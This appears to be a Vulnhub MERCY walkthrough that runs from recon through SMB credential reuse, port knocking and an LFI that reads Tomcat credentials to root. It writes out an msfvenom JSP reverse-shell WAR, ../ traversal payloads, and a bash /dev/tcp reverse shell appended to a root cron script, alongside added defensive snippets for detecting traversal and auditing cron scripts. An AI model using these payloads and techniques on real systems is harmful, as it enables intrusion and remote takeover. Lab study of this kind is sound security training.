[Vulnhub] MERCY: SMB + RIPS LFI + Tomcat + Port Knocking + Timeclock privilege escalation
maptnh 2024-07-19 22:21:23 50020

Information Gathering

IP Address       Open Ports
192.168.101.151  TCP: 80, 22, 53, 110, 139, 143, 445, 993, 995, 8080

$ nmap -p- 192.168.101.151 --min-rate 1000 -sC -sV

PORT     STATE SERVICE     VERSION
53/tcp   open  domain      ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_  bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp  open  pop3        Dovecot pop3d
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: UIDL TOP STLS AUTH-RESP-CODE RESP-CODES PIPELINING SASL CAPA
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp  open  imap        Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_imap-capabilities: LITERAL+ IDLE SASL-IR more listed IMAP4rev1 OK LOGIN-REFERRALS capabilities ENABLE LOGINDISABLEDA0001 STARTTLS post-login have Pre-login ID
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp  open  ssl/imap    Dovecot imapd (Ubuntu)
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: LITERAL+ IDLE more listed IMAP4rev1 SASL-IR LOGIN-REFERRALS AUTH=PLAINA0001 OK capabilities ENABLE post-login have Pre-login ID
995/tcp  open  ssl/pop3    Dovecot pop3d
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=localhost/organizationName=Dovecot mail server
| Not valid before: 2018-08-24T13:22:55
|_Not valid after:  2028-08-23T13:22:55
|_pop3-capabilities: UIDL TOP PIPELINING AUTH-RESP-CODE RESP-CODES USER SASL(PLAIN) CAPA
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
| http-methods:
|_  Potentially risky methods: PUT DELETE
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-open-proxy: Proxy might be redirecting requests

Local Access

http://192.168.101.151:8080/robots.txt

robots.txt (already visible in the nmap output) disallows /tryharder/tryharder, which holds a base64-encoded note:

$ echo 'SXQncyBhbm5veWluZywgYnV0IHdlIHJlcGVhdCB0aGlzIG92ZXIgYW5kIG92ZXIgYWdhaW46IGN5YmVyIGh5Z2llbmUgaXMgZXh0cmVtZWx5IGltcG9ydGFudC4gUGxlYXNlIHN0b3Agc2V0dGluZyBzaWxseSBwYXNzd29yZHMgdGhhdCB3aWxsIGdldCBjcmFja2VkIHdpdGggYW55IGRlY2VudCBwYXNzd29yZCBsaXN0LgoKT25jZSwgd2UgZm91bmQgdGhlIHBhc3N3b3JkICJwYXNzd29yZCIsIHF1aXRlIGxpdGVyYWxseSBzdGlja2luZyBvbiBhIHBvc3QtaXQgaW4gZnJvbnQgb2YgYW4gZW1wbG95ZWUncyBkZXNrISBBcyBzaWxseSBhcyBpdCBtYXkgYmUsIHRoZSBlbXBsb3llZSBwbGVhZGVkIGZvciBtZXJjeSB3aGVuIHdlIHRocmVhdGVuZWQgdG8gZmlyZSBoZXIuCgpObyBmbHVmZnkgYnVubmllcyBmb3IgdGhvc2Ugd2hvIHNldCBpbnNlY3VyZSBwYXNzd29yZHMgYW5kIGVuZGFuZ2VyIHRoZSBlbnRlcnByaXNlLg=='|base64 -d

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.

Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.

No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

$ enum4linux 192.168.101.151

enum4linux returns four usernames:

pleadformercy
qiu
thisisasuperduperlonguser
fluffy

The decoded note gives the password away; it works for qiu:

username:qiu
password:password

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password'

$ smbmap -H 192.168.101.151 -u 'qiu' -p 'password' -s qiu -r --depth 10

$ smbclient //192.168.101.151/qiu -U qiu

smb: \> lcd ./dev
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *

$ cat .private/opensesame/config

Port knocking to open the SSH and HTTP ports

The config file holds one knock sequence per service:

http:159,27391,4
ssh:17301,28504,9999

$ knock 192.168.101.151 17301 28504 9999 -d 300 -v

$ knock 192.168.101.151 159 27391 4 -d 300 -v
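
Added example, not the author's tooling: a small Python client that parses the same `service:port,port,port` lines as the config above and replays one sequence with the 300 ms spacing used in the knock commands, then checks whether the knocked service answers. The host, delay and config text come from the page; the function names and `KNOCK_CONFIG` copy are my own.

```python
import socket
import time

# Constructed copy of the config format shown on the page: service:port,port,port
KNOCK_CONFIG = """\
http:159,27391,4
ssh:17301,28504,9999
"""

def parse_knock_config(text):
    """Parse 'service:p1,p2,p3' lines into {service: [p1, p2, p3]}."""
    sequences = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or ":" not in line:
            continue
        service, ports = line.split(":", 1)
        sequences[service.strip()] = [int(p) for p in ports.split(",") if p.strip()]
    return sequences

def knock(host, ports, delay_ms=300, timeout=0.5):
    """Attempt one TCP connection per port, in order, pausing delay_ms between
    attempts. knockd only needs to see the connection attempt, so a refused or
    timed-out connect is the normal outcome. Returns the ports attempted."""
    attempted = []
    for port in ports:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        try:
            s.connect((host, port))
        except OSError:
            pass  # closed/filtered port: the firewall still logged the knock
        finally:
            s.close()
        attempted.append(port)
        time.sleep(delay_ms / 1000)
    return attempted

def is_open(host, port, timeout=2.0):
    """True if the service behind the knock sequence now accepts connections."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    seqs = parse_knock_config(KNOCK_CONFIG)
    target = "192.168.101.151"  # the lab host from the page
    for service, port in (("ssh", 22), ("http", 80)):
        knock(target, seqs[service])
        print(service, "open" if is_open(target, port) else "still closed")
```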

$ dirb http://192.168.101.151/

http://192.168.101.151/robots.txt

http://192.168.101.151/nomercy/

http://192.168.101.151/mercy/

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../etc/passwd

$ whatweb http://192.168.101.151:8080 -v

http://192.168.101.151/nomercy/windows/code.php?file=../../../../../../var/lib/tomcat7/conf/tomcat-users.xml
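
Added example (not RIPS's or the author's code) showing the defender's side of the `file=` traversal above: a containment check that keeps a requested path inside the web root, and a scan over constructed access-log lines that flags the two reads shown on this page after URL decoding. The web root `/var/www/html/nomercy` and the log lines are assumptions.

```python
import os
import re
import urllib.parse

# Hardened form of the pattern exploited above: the application must only ever
# open files beneath one allowed directory, whatever the `file=` parameter holds.
def resolve_within(base_dir, requested):
    """Absolute path of `requested` if it stays inside base_dir, else None.
    realpath() collapses ../ segments and symlinks before the containment
    check, so '../../../../../../etc/passwd' cannot escape."""
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, requested.lstrip("/")))
    if candidate == base or candidate.startswith(base + os.sep):
        return candidate
    return None

# Constructed access-log lines (assumed web root /var/www/html/nomercy; not from the page).
SAMPLE_LOG = """\
192.168.101.128 - - [19/Jul/2024:22:10:01 +0800] "GET /nomercy/windows/code.php?file=../../../../../../etc/passwd HTTP/1.1" 200 2311
192.168.101.128 - - [19/Jul/2024:22:10:09 +0800] "GET /nomercy/windows/code.php?file=..%2F..%2F..%2Fvar%2Flib%2Ftomcat7%2Fconf%2Ftomcat-users.xml HTTP/1.1" 200 1420
192.168.101.50 - - [19/Jul/2024:22:11:30 +0800] "GET /mercy/index.html HTTP/1.1" 200 512
"""

TRAVERSAL = re.compile(r"(^|/)\.\.(/|$)")

def find_traversal(log_text):
    """(client_ip, decoded file parameter) for every request whose file=
    value contains a ../ segment after URL decoding (catches %2F encoding)."""
    hits = []
    for line in log_text.splitlines():
        m = re.search(r'^(\S+) .*?"GET (\S+) HTTP', line)
        if not m:
            continue
        ip, target = m.groups()
        query = urllib.parse.urlsplit(target).query
        for value in urllib.parse.parse_qs(query).get("file", []):
            if TRAVERSAL.search(value):
                hits.append((ip, value))
    return hits
```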

username:fluffy
password:freakishfluffybunny

username:thisisasuperduperlonguser
password:heartbreakisinevitable

http://192.168.101.151:8080/manager/html

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.128 LPORT=10032 -f war >reverse.war

http://192.168.101.151:8080/reverse/

Local.txt screenshot

Local.txt contents

Plz have mercy on me! :-( :-(

Privilege Escalation

python -c 'import pty;pty.spawn("/bin/bash")'

tomcat7@MERCY:/var/lib/tomcat7$ su fluffy

$ ls -la /home/fluffy/.private/secrets

$ ./pspy32

$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10034 0>&1'">>/home/fluffy/.private/secrets/timeclock
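
Added example, not from the page: an audit of the cron target used for the escalation above, assuming (as the ls and pspy steps suggest) that a root cron job executes `/home/fluffy/.private/secrets/timeclock` and that fluffy can write to it. It reports the ownership and write bits that let a non-root user alter the script and flags the /dev/tcp line appended above; `demo()` builds a constructed copy in a temporary directory.

```python
import os
import re
import stat
import tempfile

# Lab path from the page; assumed to be the script a root cron job executes.
DEFAULT_TARGET = "/home/fluffy/.private/secrets/timeclock"
SHELL_PATTERN = re.compile(r"/dev/tcp/\d+\.\d+\.\d+\.\d+/\d+")

def audit_cron_target(path, trusted_uid=0):
    """Findings for a script run by a root cron job: it must be owned by root,
    not writable by group/others, and live in a directory with the same
    properties; otherwise a local user can rewrite it and run code as root."""
    findings = []
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        findings.append("symlink")
        st = os.stat(path)
    if st.st_uid != trusted_uid:
        findings.append("owner-not-root")
    if st.st_mode & stat.S_IWGRP:
        findings.append("group-writable")
    if st.st_mode & stat.S_IWOTH:
        findings.append("world-writable")
    parent = os.stat(os.path.dirname(os.path.abspath(path)))
    if parent.st_uid != trusted_uid or parent.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("parent-dir-writable-by-others")
    return findings

def suspicious_lines(path):
    """Lines that open a TCP socket through bash's /dev/tcp, the pattern
    appended to timeclock in the write-up."""
    with open(path, errors="replace") as f:
        return [ln.strip() for ln in f if SHELL_PATTERN.search(ln)]

def demo():
    """Build a constructed copy of the weak setup in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "timeclock")
        with open(script, "w") as f:
            f.write("#!/bin/bash\ndate >> /tmp/timeclock.log\n")  # constructed body
            # Same kind of line the write-up appends; constructed, not a live endpoint.
            f.write("/bin/bash -c 'bash -i >& /dev/tcp/192.168.101.128/10034 0>&1'\n")
        os.chmod(script, 0o777)
        return audit_cron_target(script), suspicious_lines(script)

if __name__ == "__main__":
    print(audit_cron_target(DEFAULT_TARGET) if os.path.exists(DEFAULT_TARGET) else demo())
```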

Proof.txt screenshot

Proof.txt contents

Congratulations on rooting MERCY. :-)
